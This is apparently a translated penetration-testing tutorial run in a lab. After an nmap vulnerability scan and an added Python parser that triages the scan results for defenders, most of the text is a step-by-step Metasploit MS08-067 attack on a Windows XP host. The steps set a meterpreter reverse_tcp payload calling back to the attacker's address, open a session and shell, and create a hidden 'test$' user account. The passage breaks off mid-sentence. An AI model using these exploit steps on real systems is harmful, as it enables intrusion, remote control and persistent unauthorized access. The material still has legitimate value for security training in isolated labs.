One of the best ways to check for vulnerabilities by hand is to run nmap's scanning scripts from inside Metasploit.
root@bt:/opt/metasploit/msf3# msfconsole
msf > nmap -sT -A --script=smb-check-vulns -PO 172.16.21.170
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-11-19 14:58 CST
Nmap scan report for 172.16.21.170
Host is up (0.00035s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft ESMTP 6.0.2600.1
80/tcp open http Microsoft IIS httpd 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1057/tcp open msrpc Microsoft Windows RPC
1058/tcp open msrpc Microsoft Windows RPC
5000/tcp open upnp Microsoft Windows UPnP
MAC Address: 00:0C:29:9F:1E:49 (VMware)
Device type: general purpose
Running: Microsoft Windows 2000|XP
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
Network Distance: 1 hop
Service Info: Host: lixiuli-vcs86vr; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-check-vulns:
| MS08-067: LIKELY VULNERABLE (host stopped responding)
| Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: TIMEOUT
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 172.16.21.170
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.88 seconds
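The host-script block above is the part of the report that matters, and the statuses are not all equivalent: LIKELY VULNERABLE is a real finding, UNKNOWN means the probe timed out, and CHECK DISABLED means the probe was never run, so it says nothing about patch state. The following parser, an added example that is not part of the original post, turns a report in this layout into a per-host triage list. It embeds the scan output shown on the page as its input; the field spacing it expects is the single-space layout reproduced above, but the patterns also accept nmap's normal column indentation. The action names ("patch", "retest", "untested", "ok") are the example's own labels.

```python
"""Parse an nmap report that ran the smb-check-vulns script and sort its
results into defender actions (patch, retest, untested, ok)."""
import re
from collections import namedtuple

# Copied from the scan output shown on the page (trimmed to the parts the
# parser uses); the field spacing is as the page reproduces it.
SAMPLE = """Nmap scan report for 172.16.21.170
Host is up (0.00035s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft ESMTP 6.0.2600.1
80/tcp open http Microsoft IIS httpd 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1057/tcp open msrpc Microsoft Windows RPC
1058/tcp open msrpc Microsoft Windows RPC
5000/tcp open upnp Microsoft Windows UPnP
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
Host script results:
| smb-check-vulns:
| MS08-067: LIKELY VULNERABLE (host stopped responding)
| Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: TIMEOUT
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
"""

Finding = namedtuple("Finding", "check status detail")
Port = namedtuple("Port", "port proto state service version")

# One result line of the script, e.g. "| MS08-067: LIKELY VULNERABLE (...)".
# The check name runs up to the first colon, so "SMBv2 DoS (CVE-2009-3103)"
# stays intact while "Conficker: UNKNOWN; got error SMB: ..." splits correctly.
FINDING_RE = re.compile(
    r"^\|_?\s*(?P<check>[^:]+):\s*"
    r"(?P<status>NOT VULNERABLE|LIKELY VULNERABLE|VULNERABLE|UNKNOWN|"
    r"CHECK DISABLED|ERROR)\b(?P<detail>.*)$"
)
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+"
                     r"(?P<service>\S+)(?:\s+(?P<version>.*))?$")
HOST_RE = re.compile(r"^Nmap scan report for (?P<host>\S+)")
OS_RE = re.compile(r"^OS details: (?P<os>.*)$")

# What a defender does with each status (labels are this example's own).
# CHECK DISABLED means the probe never ran (safe mode), which is not
# evidence that the host is patched.
ACTION = {
    "VULNERABLE": "patch",
    "LIKELY VULNERABLE": "patch",
    "UNKNOWN": "retest",
    "ERROR": "retest",
    "CHECK DISABLED": "untested",
    "NOT VULNERABLE": "ok",
}


def parse_findings(report):
    """Return the smb-check-vulns results as Finding tuples, in report order."""
    findings = []
    for line in report.splitlines():
        m = FINDING_RE.match(line)
        if m:
            findings.append(Finding(m["check"].strip(), m["status"],
                                    m["detail"].strip(" ;")))
    return findings


def parse_ports(report):
    """Return the port table as Port tuples (version is '' when absent)."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m["port"]), m["proto"], m["state"],
                              m["service"], (m["version"] or "").strip()))
    return ports


def triage(report):
    """Group the check names by the action they call for."""
    grouped = {action: [] for action in set(ACTION.values())}
    for f in parse_findings(report):
        grouped[ACTION[f.status]].append(f.check)
    return grouped


def summary(report):
    """One-line view of a host: address, OS guess, SMB exposure, actions."""
    lines = report.splitlines()
    host = next((m["host"] for m in map(HOST_RE.match, lines) if m), None)
    os_guess = next((m["os"] for m in map(OS_RE.match, lines) if m), "")
    smb_open = any(p.port in (139, 445) and p.state == "open"
                   for p in parse_ports(report))
    return {"host": host, "os": os_guess, "smb_exposed": smb_open,
            "actions": triage(report)}


if __name__ == "__main__":
    s = summary(SAMPLE)
    print(f"{s['host']} ({s['os']}) smb_exposed={s['smb_exposed']}")
    for action, checks in sorted(s["actions"].items()):
        if checks:
            print(f"  {action:9s} {', '.join(checks)}")
```

Run against the page's report, the script puts only MS08-067 in the patch bucket, sends Conficker back for a retest (the SMB timeout is the same "host stopped responding" symptom the MS08-067 probe reported), and lists the four disabled checks as untested rather than clean.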
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi load this module with the use command
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp set the payload to the Windows meterpreter/reverse_tcp; once the exploit succeeds, this payload makes the target host open a reverse connection back to the IP address given in LHOST, which lets the session get past a firewall's inbound filtering or through a NAT gateway
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets most MSF exploit modules identify the target system type automatically, so this parameter does not normally need to be set by hand, but with the MS08-067 exploit the automatic identification usually fails to determine the system type correctly
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)
4 Windows XP SP2 English (NX)
5 Windows XP SP3 English (AlwaysOn NX)
6 Windows XP SP3 English (NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)
msf exploit(ms08_067_netapi) > set target 2 specify the operating system type
target => 2
msf exploit(ms08_067_netapi) > set rhost 172.16.21.170 specify the target address
rhost => 172.16.21.170
msf exploit(ms08_067_netapi) > set lhost 172.16.21.17 IP address of the attacking machine
lhost => 172.16.21.17
msf exploit(ms08_067_netapi) > set lport 8080 TCP port the attacking machine listens on
lport => 8080
msf exploit(ms08_067_netapi) > show options check that every parameter has been set correctly
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.21.170 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 172.16.21.17 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
2 Windows XP SP0/SP1 Universal
msf exploit(ms08_067_netapi) > exploit launch the attack
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.21.17:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.21.17:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.21.170
[*] Meterpreter session 1 opened (172.16.21.17:8080 -> 172.16.21.170:1039) at 2013-11-19 15:23:40 +0800
The exploit command initializes the attack environment and attempts the exploit against the target. The first attempt failed with STATUS_PIPE_NOT_AVAILABLE; the retry succeeded and opened Meterpreter session 1.
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > shell
Process 732 created.
Channel 1 created.
Microsoft Windows XP [ 5.1.2600]
(C) 1985-2001 Microsoft Corp.
C:\windows>net user test$ 123456 /add
Now go to the attacked machine (170) and take a look: